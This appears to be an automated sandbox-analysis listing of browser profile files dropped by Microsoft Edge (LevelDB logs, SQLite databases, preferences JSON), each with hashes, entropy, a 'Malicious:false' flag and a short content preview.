                                                                                                                                                                                                                                                                                                SHA-256:46EC7F15A2631730E895B28B5487F2DB5C4F9E4FBAF0684A3D2F8C36D693C190
                                                                                                                                                                                                                                                                                                SHA-512:4E1B4E3C6434D82540E652FBA33FE98AB14D10744670E12EDEF208819EC00CA09E9F314CD30B843FBCD8B0B68AE0D0EC30A61E2E2971D1417900838D86D750F9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:49.808 1c74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/20-01:31:49.810 1c74 Recovering log #3.2024/12/20-01:31:49.813 1c74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):426
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.2146850535924125
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:tCyvVaYebvqBZFUt8W/+7R5OaYebvqBaJ:EYVaYebvyg8TDOaYebvL
                                                                                                                                                                                                                                                                                                MD5:0BFA7315D70FF077479FCD86F2131501
                                                                                                                                                                                                                                                                                                SHA1:AC3DF4F7FC5A16381FFABCB1388BF265A5A42015
                                                                                                                                                                                                                                                                                                SHA-256:46EC7F15A2631730E895B28B5487F2DB5C4F9E4FBAF0684A3D2F8C36D693C190
                                                                                                                                                                                                                                                                                                SHA-512:4E1B4E3C6434D82540E652FBA33FE98AB14D10744670E12EDEF208819EC00CA09E9F314CD30B843FBCD8B0B68AE0D0EC30A61E2E2971D1417900838D86D750F9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:49.808 1c74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/20-01:31:49.810 1c74 Recovering log #3.2024/12/20-01:31:49.813 1c74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):332
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.121555176232549
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PFcqM+q2PN723oH+TcwtpIFUt8IFBVZZmw+IFBVMMVkwON723oH+Tcwta/WLJ:NcqM+vVaYebmFUt8cBn/+cBaMV5OaYev
                                                                                                                                                                                                                                                                                                MD5:3127DD432B5C9C083F65DA2B1A78EC1D
                                                                                                                                                                                                                                                                                                SHA1:E86F153E15B99E6EBC08796191446E7EDECE0A30
                                                                                                                                                                                                                                                                                                SHA-256:95C402440FFAC92C81915C5553FA715AD26E170D1DAE466B1C75EC8DF61D8EB9
                                                                                                                                                                                                                                                                                                SHA-512:49C631FE9DBE1EBD568368D347D6E2ABBE23D3F669946F49EC7848D92D38F918C95C245259FAB7A8629707E4C635903BC21F84B30091FBBD4CC2167348CD8012
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.323 1d6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/20-01:31:31.324 1d6c Recovering log #3.2024/12/20-01:31:31.324 1d6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.2678890710798698
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:L/2qOB1nxCkMWSA1LyKOMq+8iP5GDHP/0jMVum8:Kq+n0JW91LyKOMq+8iP5GLP/0Z
                                                                                                                                                                                                                                                                                                MD5:4410796A6E7A6E64DCA5EC2B9B8941AD
                                                                                                                                                                                                                                                                                                SHA1:14B68BB9ACACE8FD53484EC0F538E5B9CBC169DE
                                                                                                                                                                                                                                                                                                SHA-256:E675A0BB00F57AABC0D8190BDEBE53175794578111BAD71FB30E32221F1E4915
                                                                                                                                                                                                                                                                                                SHA-512:35EF59EBA6F084DDA22D48B8C58183609C20162328B0F022FFB329FCCC3BC28EAF832858B420EC0F203C9D36A9CF9F902C22E7BBBCAA870E98E1FA10E61CCB19
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.46681860061706393
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0GH:v7doKsKuKZKlZNmu46yjx0i
                                                                                                                                                                                                                                                                                                MD5:D97F56DB859BA32A3876EDB4B4D9C7F0
                                                                                                                                                                                                                                                                                                SHA1:839E66AD666C1E655E24C2ED7A3C7B0EC28F1ADC
                                                                                                                                                                                                                                                                                                SHA-256:56C5D19ED15EE93B57A114EC10ED5815AFCC6759F7144B26A53F6FBEAE914869
                                                                                                                                                                                                                                                                                                SHA-512:7C6DD1482A211AC37E05843D863DF7D2D56E0CE119896C706612E7C0B026D320C0A1827AAFDD79E7521CAB7DC7A34C028EDC8D85ACBC029AB0F2330ED7DE139F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11755
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.567490185483211
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:YQxNMrWoUW5wcOf4yt8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP0QIGLeurwXhfpXtL:Ya+rxUWacOfTtu1jat0KrntL
                                                                                                                                                                                                                                                                                                MD5:438FDD906E9FAB2679F38815B79A49AD
                                                                                                                                                                                                                                                                                                SHA1:83097EAF926A2FFE2D3F7F2EE424B78DD10E2B32
                                                                                                                                                                                                                                                                                                SHA-256:CBCEF6D7A9FFE7B7E80E4F5F468F8E2E7E597568C5871F2256CEBDECEA2E8047
                                                                                                                                                                                                                                                                                                SHA-512:B2619B4C1E043B5F085DB40D931AF11421BCEBC59C1E7A4C5C70AEB585CA06B67923DD2BEB24C682BF49404589C7C087935121D7C436613C350791574842C0DB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379149891335447","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379149891335447","location":5,"ma
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9757
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.109627052660825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEkdpwseDBaFvrE9kmns8PbV+FIAQA+TU1P9YJ:stEQwseDBCDqbGzQ4g
                                                                                                                                                                                                                                                                                                MD5:7A40413DEB051EF474E2AF7567B53490
                                                                                                                                                                                                                                                                                                SHA1:AAB4876FCC6DCB2AEB591FAEFA259F6185BCB5AB
                                                                                                                                                                                                                                                                                                SHA-256:BED4D76473EB58012334149C6CF1048016C4FD72CD3BA5CDCE89020D77FAEFAE
                                                                                                                                                                                                                                                                                                SHA-512:CE1256B92B3357B4F3EF43EBCCE0D54CFB8B06CEC2CC5485D89E01FAF1BBF75A775EBE5674E9AD782B5E8B8DD22B0B72467B35F74F6D4C91E423CBCA4DDA2D9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.10135797548516706
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:+AqkY3AqkPBspEjVl/PnnnnnnnnnnnvoQ/Eou:+LRLACoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                                MD5:B575F604AC1E932434DA1244E513E6CE
                                                                                                                                                                                                                                                                                                SHA1:84667EBA3250F61B2FA0229C22C63E4EA45A7D94
                                                                                                                                                                                                                                                                                                SHA-256:ED81AF94BC80D9E4EE13B9E05E5376D4129D83057877C66DA1730649594E6578
                                                                                                                                                                                                                                                                                                SHA-512:E1121D481D5AFCD72F422C9EB982063F18DB09EACCF39614E2E8BBEFAE39C5FC5A3EABE2FBC4E6F40B731F91D0B7EB62ACDB14C896743C52109CAA64EF185F92
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):317272
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8898846608473822
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:th4Aa/PDUcYRwqYG7fYPIaYBixYyxhY/ZMG1hYn4v8lyQyQ1ydy51yTxycv:5X
                                                                                                                                                                                                                                                                                                MD5:18A89B6D07CBCDCC1E9C09A0A2777906
                                                                                                                                                                                                                                                                                                SHA1:42FC1A81EB634D02534B8296D392F8887FB6EAF9
                                                                                                                                                                                                                                                                                                SHA-256:7819BC83E528BFE31B8E84CCAE4F18A2D05010039B289861508DA87EEC29FE37
                                                                                                                                                                                                                                                                                                SHA-512:0441E0B7070071EE23B5718B929BA7B55E58CA5E22E8DF7796B769215DD4C696EE27099E640CD54C0FB4A44003E10FAA24D54DA27EF48838AE3514F8082D3302
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):628
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2343826349373366
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuuuVs88:pHay4
                                                                                                                                                                                                                                                                                                MD5:6EA545DAC05AB5D87ACA44EB9ADBB6A5
                                                                                                                                                                                                                                                                                                SHA1:AF40E0F29E41A1D3A6392BEAF2304381BBB17F77
                                                                                                                                                                                                                                                                                                SHA-256:2BD9D92C93FC9FFBE628C76FEB06B7356901E478C8FCC6591FBF1327A0ADF714
                                                                                                                                                                                                                                                                                                SHA-512:1F4FA78813668FB4F4BFFE1B07C51985BEA87D64581653A44E2F0D1A9E9EDFB3C5D11916CB6CD84DE6697526346A10FE627F5BD7F64D39BD5AA121DC0D7D0B60
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.155054069602851
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:P7VOSMq2PN723oH+TcwtfrK+IFUt8I729Zmw+I72PkwON723oH+TcwtfrUeLJ:pOPvVaYeb23FUt8R/+L5OaYeb3J
                                                                                                                                                                                                                                                                                                MD5:9F35E3811AD10EA7444EF9FC6233C0CB
                                                                                                                                                                                                                                                                                                SHA1:F4619EAC0A0D65FF76A0C6E54874F7883B9CABE1
                                                                                                                                                                                                                                                                                                SHA-256:D61AFD83E6EFAF43071086628ABE0DF12CBAF5C8F9DDA1B4F15511F2FFEDD13A
                                                                                                                                                                                                                                                                                                SHA-512:A6E2A6D88A056D94C04BB4ACA83A2D2639FE354AFCD38DFCFB983215E0BBFC554502DCF905A2809DB8CD08039BB1998A97FCF1D9A2C078B741392A14BFF64B22
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.044 1d74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/20-01:31:32.045 1d74 Recovering log #3.2024/12/20-01:31:32.045 1d74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):816
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                                                MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                                                SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                                                SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                                                SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):346
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.172782961520596
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PPX6q2PN723oH+TcwtfrzAdIFUt8IPXzZmw+IPXpkwON723oH+TcwtfrzILJ:qvVaYeb9FUt8M/+s5OaYeb2J
                                                                                                                                                                                                                                                                                                MD5:29EA8335CC1B6066C3203CB3C83BD894
                                                                                                                                                                                                                                                                                                SHA1:E8B09D592787E35B465F7E7A1B8426415071833D
                                                                                                                                                                                                                                                                                                SHA-256:6E73E3D62AFA44065A436F5F75E7DB2C72785B6D4DCEF21582A6D0E5475C5839
                                                                                                                                                                                                                                                                                                SHA-512:227B6D5E322019CB62047C056794757EC703747768ECF665EEEDCB543421AF0CD049BEE92407284A7839ADC5250AB22FCB6BA1005156A9736B994FD302567766
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.980 1d74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/20-01:31:31.980 1d74 Recovering log #3.2024/12/20-01:31:31.980 1d74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):120
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                                                MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                                                SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                                                SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                                                SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
Malicious:false
Preview:117.0.2045.55
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):44455
Entropy (8bit):6.089772247328986
Encrypted:false
SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynOukzItSmd6qE7lFoC
MD5:6356EC0D498B0C96EB67C9B703292822
SHA1:04F3FD4D1E2C26E4D515AF619FC43F4648D889AA
SHA-256:D26948D35C2A90233F45991416939161E8062EE802836E5C068A69AFB940C99B
SHA-512:37D6613948326F6775EDF004CF7FE1763904A0FC3FA940BD62722DDC9A745A271BDD59122DDF22860941A5FA235BF5FC51273E4E2019D138CCBC7928CF41E68D
Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:dropped
Size (bytes):20480
Entropy (8bit):0.6773696719930975
Encrypted:false
